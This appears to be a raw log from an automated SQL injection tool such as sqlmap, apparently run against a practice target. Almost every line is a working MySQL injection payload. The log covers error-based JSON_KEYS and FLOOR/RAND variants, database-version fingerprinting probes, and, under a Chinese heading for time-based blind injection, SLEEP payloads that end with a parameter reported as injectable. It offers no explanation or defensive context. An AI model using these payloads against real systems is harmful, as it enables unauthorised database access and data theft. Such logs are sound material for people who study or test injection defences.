[10:59:28] [PAYLOAD] 1212' AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8))) AND 'dGSK'='dGSK
[10:59:28] [PAYLOAD] 1212') AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8))) AND ('CQAH' LIKE 'CQAH
[10:59:28] [PAYLOAD] 1212')) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8))) AND (('EKyh' LIKE 'EKyh
[10:59:28] [PAYLOAD] 1212'))) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8))) AND ((('ZIph' LIKE 'ZIph
[10:59:28] [PAYLOAD] 1212%' AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8))) AND 'Lyqs%'='Lyqs
[10:59:28] [PAYLOAD] 1212' AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8))) AND 'QdNg' LIKE 'QdNg
[10:59:28] [PAYLOAD] 1212") AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8))) AND ("xicD"="xicD
[10:59:28] [PAYLOAD] 1212")) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8))) AND (("NdAC"="NdAC
[10:59:28] [PAYLOAD] 1212"))) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8))) AND ((("jgfg"="jgfg
[10:59:28] [PAYLOAD] 1212" AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8))) AND "kVCP"="kVCP
[10:59:28] [PAYLOAD] 1212") AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8))) AND ("ehIw" LIKE "ehIw
[10:59:28] [PAYLOAD] 1212")) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8))) AND (("FwxT" LIKE "FwxT
[10:59:28] [PAYLOAD] 1212"))) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8))) AND ((("Wowa" LIKE "Wowa
[10:59:28] [PAYLOAD] 1212" AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8))) AND "QIEs" LIKE "QIEs
[10:59:28] [PAYLOAD] 1212 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8)))-- mFyF
[10:59:28] [PAYLOAD] 1212 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8)))# pNYb
[10:59:28] [PAYLOAD] 1212' AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8))) OR 'dnxG'='FdPK
[10:59:28] [PAYLOAD] 1212') WHERE 5301=5301 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8)))-- PyHA
[10:59:28] [PAYLOAD] 1212") WHERE 8693=8693 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8)))-- qNXO
[10:59:28] [PAYLOAD] 1212) WHERE 9366=9366 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8)))-- qAfR
[10:59:28] [PAYLOAD] 1212' WHERE 9211=9211 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8)))-- bqnF
[10:59:28] [PAYLOAD] 1212" WHERE 9146=9146 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8)))-- ZPIS
[10:59:28] [PAYLOAD] 1212 WHERE 1074=1074 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8)))-- XAwm
[10:59:28] [PAYLOAD] 1212'||(SELECT 0x7949515a WHERE 1760=1760 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8))))||'
[10:59:28] [PAYLOAD] 1212'||(SELECT 0x756c4a59 FROM DUAL WHERE 9733=9733 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8))))||'
[10:59:28] [PAYLOAD] 1212'+(SELECT 0x57516977 WHERE 3667=3667 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8))))+'
[10:59:28] [PAYLOAD] 1212||(SELECT 0x425a4552 FROM DUAL WHERE 5397=5397 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8))))||
[10:59:28] [PAYLOAD] 1212||(SELECT 0x594e4a75 WHERE 4659=4659 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8))))||
[10:59:28] [PAYLOAD] 1212+(SELECT YDRa WHERE 2275=2275 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8))))+
[10:59:28] [PAYLOAD] 1212+(SELECT 0x594b646e WHERE 1768=1768 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8))))+
[10:59:28] [PAYLOAD] 1212')) AS XzvU WHERE 6427=6427 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8)))-- sBmF
[10:59:28] [PAYLOAD] 1212")) AS gAcu WHERE 8538=8538 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8)))-- Cbnr
[10:59:29] [PAYLOAD] 1212)) AS FbbL WHERE 9440=9440 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8)))-- hLuC
[10:59:29] [PAYLOAD] 1212') AS Dwnv WHERE 5563=5563 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8)))-- vZFw
[10:59:29] [PAYLOAD] 1212") AS WebQ WHERE 7510=7510 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8)))-- cYQG
[10:59:29] [PAYLOAD] 1212) AS WuGL WHERE 8160=8160 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8)))-- bFlN
[10:59:29] [PAYLOAD] 1212` WHERE 3964=3964 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8)))-- XwdH
[10:59:29] [PAYLOAD] 1212`) WHERE 4633=4633 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8)))-- opxx
[10:59:29] [PAYLOAD] 1212`=`1212` AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8))) AND `1212`=`1212
[10:59:29] [PAYLOAD] 1212"="1212" AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8))) AND "1212"="1212
[10:59:29] [PAYLOAD] 1212]-(SELECT 0 WHERE 9456=9456 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8))))|[1212
[10:59:29] [PAYLOAD] 1212' IN BOOLEAN MODE) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(9340=9340,1))),0x7176627071)) USING utf8)))#
[10:59:29] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[10:59:29] [PAYLOAD] 1212) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8)))-- PdAB
[10:59:29] [PAYLOAD] 1212') OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8)))-- EmYc
[10:59:29] [PAYLOAD] 1212' OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8)))-- tTUZ
[10:59:29] [PAYLOAD] 1212" OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8)))-- erlS
[10:59:29] [PAYLOAD] 1212) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8))) AND (9390=9390
[10:59:29] [PAYLOAD] 1212)) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8))) AND ((8547=8547
[10:59:29] [PAYLOAD] 1212))) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8))) AND (((8925=8925
[10:59:29] [PAYLOAD] 1212 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8)))
[10:59:29] [PAYLOAD] 1212') OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8))) AND ('xtiu'='xtiu
[10:59:29] [PAYLOAD] 1212')) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8))) AND (('XzZJ'='XzZJ
[10:59:29] [PAYLOAD] 1212'))) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8))) AND ((('xAud'='xAud
[10:59:29] [PAYLOAD] 1212' OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8))) AND 'PeIJ'='PeIJ
[10:59:29] [PAYLOAD] 1212') OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8))) AND ('ssEH' LIKE 'ssEH
[10:59:29] [PAYLOAD] 1212')) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8))) AND (('gxQF' LIKE 'gxQF
[10:59:29] [PAYLOAD] 1212'))) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8))) AND ((('pFbi' LIKE 'pFbi
[10:59:29] [PAYLOAD] 1212%' OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8))) AND 'uwzl%'='uwzl
[10:59:29] [PAYLOAD] 1212' OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8))) AND 'JgLY' LIKE 'JgLY
[10:59:29] [PAYLOAD] 1212") OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8))) AND ("jCMf"="jCMf
[10:59:29] [PAYLOAD] 1212")) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8))) AND (("lNdU"="lNdU
[10:59:29] [PAYLOAD] 1212"))) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8))) AND ((("PdRm"="PdRm
[10:59:29] [PAYLOAD] 1212" OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8))) AND "hXzs"="hXzs
[10:59:29] [PAYLOAD] 1212") OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8))) AND ("fnvM" LIKE "fnvM
[10:59:29] [PAYLOAD] 1212")) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8))) AND (("ELWD" LIKE "ELWD
[10:59:29] [PAYLOAD] 1212"))) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8))) AND ((("wEjD" LIKE "wEjD
[10:59:29] [PAYLOAD] 1212" OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8))) AND "Iufc" LIKE "Iufc
[10:59:29] [PAYLOAD] 1212 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8)))-- HCyc
[10:59:29] [PAYLOAD] 1212 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8)))# ZHGn
[10:59:29] [PAYLOAD] 1212' OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8))) OR 'rzQk'='Mozt
[10:59:29] [PAYLOAD] 1212') WHERE 5761=5761 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8)))-- bkbW
[10:59:29] [PAYLOAD] 1212") WHERE 4441=4441 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8)))-- mlOj
[10:59:29] [PAYLOAD] 1212) WHERE 8345=8345 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8)))-- JBYj
[10:59:29] [PAYLOAD] 1212' WHERE 3394=3394 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8)))-- YjAr
[10:59:29] [PAYLOAD] 1212" WHERE 4813=4813 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8)))-- pEmI
[10:59:29] [PAYLOAD] 1212 WHERE 1964=1964 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8)))-- tBqq
[10:59:29] [PAYLOAD] 1212'||(SELECT 0x664b6f76 WHERE 3994=3994 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8))))||'
[10:59:29] [PAYLOAD] 1212'||(SELECT 0x70586a57 FROM DUAL WHERE 5267=5267 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8))))||'
[10:59:29] [PAYLOAD] 1212'+(SELECT 0x44456761 WHERE 2725=2725 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8))))+'
[10:59:29] [PAYLOAD] 1212||(SELECT 0x4c527a6d FROM DUAL WHERE 4971=4971 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8))))||
[10:59:29] [PAYLOAD] 1212||(SELECT 0x76526a6e WHERE 7681=7681 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8))))||
[10:59:29] [PAYLOAD] 1212+(SELECT bYye WHERE 3460=3460 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8))))+
[10:59:29] [PAYLOAD] 1212+(SELECT 0x7549746f WHERE 5546=5546 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8))))+
[10:59:29] [PAYLOAD] 1212')) AS XzLz WHERE 3607=3607 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8)))-- jRUZ
[10:59:29] [PAYLOAD] 1212")) AS zrSg WHERE 6058=6058 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8)))-- wabH
[10:59:29] [PAYLOAD] 1212)) AS QNEl WHERE 7443=7443 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8)))-- ledn
[10:59:29] [PAYLOAD] 1212') AS ooii WHERE 4862=4862 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8)))-- IthY
[10:59:29] [PAYLOAD] 1212") AS kjtg WHERE 7394=7394 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8)))-- uNkA
[10:59:29] [PAYLOAD] 1212) AS pqdz WHERE 2205=2205 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8)))-- uCgw
[10:59:29] [PAYLOAD] 1212` WHERE 4514=4514 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8)))-- MZQV
[10:59:29] [PAYLOAD] 1212`) WHERE 3440=3440 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8)))-- yFCh
[10:59:29] [PAYLOAD] 1212`=`1212` OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8))) AND `1212`=`1212
[10:59:29] [PAYLOAD] 1212"="1212" OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8))) AND "1212"="1212
[10:59:29] [PAYLOAD] 1212]-(SELECT 0 WHERE 7017=7017 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8))))|[1212
[10:59:29] [PAYLOAD] 1212' IN BOOLEAN MODE) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162707a71,(SELECT (ELT(3929=3929,1))),0x7176627071)) USING utf8)))#
[10:59:29] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[10:59:29] [PAYLOAD] 1212) AND (SELECT 2447 FROM(SELECT COUNT(*),CONCAT(0x7162707a71,(SELECT (ELT(2447=2447,1))),0x7176627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- dipT
[10:59:29] [PAYLOAD] 1212') AND (SELECT 2447 FROM(SELECT COUNT(*),CONCAT(0x7162707a71,(SELECT (ELT(2447=2447,1))),0x7176627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- diia
[10:59:29] [PAYLOAD] 1212' AND (SELECT 2447 FROM(SELECT COUNT(*),CONCAT(0x7162707a71,(SELECT (ELT(2447=2447,1))),0x7176627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- cXom
[10:59:29] [PAYLOAD] 1212" AND (SELECT 2447 FROM(SELECT COUNT(*),CONCAT(0x7162707a71,(SELECT (ELT(2447=2447,1))),0x7176627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- jEiJ
[10:59:29] [PAYLOAD] 1212) AND (SELECT 2447 FROM(SELECT COUNT(*),CONCAT(0x7162707a71,(SELECT (ELT(2447=2447,1))),0x7176627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND (1456=1456
[10:59:29] [PAYLOAD] 1212)) AND (SELECT 2447 FROM(SELECT COUNT(*),CONCAT(0x7162707a71,(SELECT (ELT(2447=2447,1))),0x7176627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ((4225=4225
[10:59:30] [PAYLOAD] 1212))) AND (SELECT 2447 FROM(SELECT COUNT(*),CONCAT(0x7162707a71,(SELECT (ELT(2447=2447,1))),0x7176627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND (((3606=3606
[10:59:30] [PAYLOAD] 1212 AND (SELECT 2447 FROM(SELECT COUNT(*),CONCAT(0x7162707a71,(SELECT (ELT(2447=2447,1))),0x7176627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
[10:59:30] [PAYLOAD] 1212') AND (SELECT 2447 FROM(SELECT COUNT(*),CONCAT(0x7162707a71,(SELECT (ELT(2447=2447,1))),0x7176627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('uZhu'='uZhu
[10:59:30] [PAYLOAD] 1212')) AND (SELECT 2447 FROM(SELECT COUNT(*),CONCAT(0x7162707a71,(SELECT (ELT(2447=2447,1))),0x7176627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND (('dTnx'='dTnx
[10:59:30] [PAYLOAD] 1212'))) AND (SELECT 2447 FROM(SELECT COUNT(*),CONCAT(0x7162707a71,(SELECT (ELT(2447=2447,1))),0x7176627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ((('xIKJ'='xIKJ
[10:59:30] [PAYLOAD] 1212' AND (SELECT 2447 FROM(SELECT COUNT(*),CONCAT(0x7162707a71,(SELECT (ELT(2447=2447,1))),0x7176627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'InVU'='InVU
[10:59:30] [PAYLOAD] 1212' AND (SELECT 6020 FROM(SELECT COUNT(*),CONCAT(0x7162707a71,(SELECT REPEAT(0x34,1024)),0x7176627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'JJVD'='JJVD
[10:59:30] [PAYLOAD] 1212' AND (SELECT 6431 FROM(SELECT COUNT(*),CONCAT(0x7162707a71,(SELECT REPEAT(0x32,512)),0x7176627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'aDyQ'='aDyQ
[10:59:30] [PAYLOAD] 1212' AND (SELECT 5035 FROM(SELECT COUNT(*),CONCAT(0x7162707a71,(SELECT REPEAT(0x36,256)),0x7176627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'YXYL'='YXYL
[10:59:30] [PAYLOAD] 1212' AND (SELECT 7694 FROM(SELECT COUNT(*),CONCAT(0x7162707a71,(SELECT REPEAT(0x34,54)),0x7176627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'eYaj'='eYaj
[10:59:30] [PAYLOAD] 1212' AND (SELECT 6585 FROM(SELECT COUNT(*),CONCAT(0x7162707a71,(SELECT (CASE WHEN (VERSION() LIKE 0x254d61726961444225) THEN 1 ELSE 0 END)),0x7176627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'SRBj'='SRBj
[10:59:30] [PAYLOAD] 1212' AND (SELECT 2193 FROM(SELECT COUNT(*),CONCAT(0x7162707a71,(SELECT (CASE WHEN (VERSION() LIKE 0x255469444225) THEN 1 ELSE 0 END)),0x7176627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'bvJk'='bvJk
[10:59:30] [DEBUG] performed 1 query in 0.02 seconds
[10:59:30] [PAYLOAD] 1212' AND (SELECT 3698 FROM(SELECT COUNT(*),CONCAT(0x7162707a71,(SELECT (CASE WHEN (@@VERSION_COMMENT LIKE 0x256472697a7a6c6525) THEN 1 ELSE 0 END)),0x7176627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'dSWI'='dSWI
[10:59:30] [DEBUG] performed 1 query in 0.02 seconds
[10:59:30] [PAYLOAD] 1212' AND (SELECT 7684 FROM(SELECT COUNT(*),CONCAT(0x7162707a71,(SELECT (CASE WHEN (@@VERSION_COMMENT LIKE 0x25506572636f6e6125) THEN 1 ELSE 0 END)),0x7176627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'zwww'='zwww
[10:59:30] [DEBUG] performed 1 query in 0.02 seconds
[10:59:30] [PAYLOAD] 1212' AND (SELECT 5906 FROM(SELECT COUNT(*),CONCAT(0x7162707a71,(SELECT (CASE WHEN (AURORA_VERSION() LIKE 0x25) THEN 1 ELSE 0 END)),0x7176627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Flmd'='Flmd
mysql 时间盲注
[11:05:45] [PAYLOAD] vince(,,()'.)"(
[11:05:46] [PAYLOAD] vince'gIqUuu<'">PmVDNY
[11:05:46] [PAYLOAD] vince) AND (SELECT 9308 FROM (SELECT(SLEEP(5)))egTe) AND (6129=6129
[11:05:48] [PAYLOAD] vince AND (SELECT 9308 FROM (SELECT(SLEEP(5)))egTe)
[11:05:48] [PAYLOAD] vince') AND (SELECT 9308 FROM (SELECT(SLEEP(5)))egTe) AND ('XPmd'='XPmd
[11:05:48] [PAYLOAD] vince' AND (SELECT 9308 FROM (SELECT(SLEEP(5)))egTe) AND 'KAzh'='KAzh
[11:05:53] [PAYLOAD] vince' AND (SELECT 9308 FROM (SELECT(SLEEP(0)))egTe) AND 'KAzh'='KAzh
[11:05:53] [PAYLOAD] vince' AND (SELECT 9308 FROM (SELECT(SLEEP(5)))egTe) AND 'KAzh'='KAzh
[11:05:58] [INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[11:05:58] [PAYLOAD] vince' AND (SELECT 6538 FROM (SELECT(SLEEP(5-(IF(36=36,0,5)))))LMTQ) AND 'icVh'='icVh
[11:06:03] [PAYLOAD] vince' AND (SELECT 8785 FROM (SELECT(SLEEP(5-(IF(36=69,0,5)))))SLGE) AND 'wNtS'='wNtS
[11:06:03] [PAYLOAD] vince' AND (SELECT 7899 FROM (SELECT(SLEEP(5-(IF(36=94,0,5)))))gfut) AND 'PEZQ'='PEZQ
[11:06:03] [PAYLOAD] vince' AND (SELECT 3177 FROM (SELECT(SLEEP(5-(IF(94=69,0,5)))))MYYC) AND 'EVvY'='EVvY
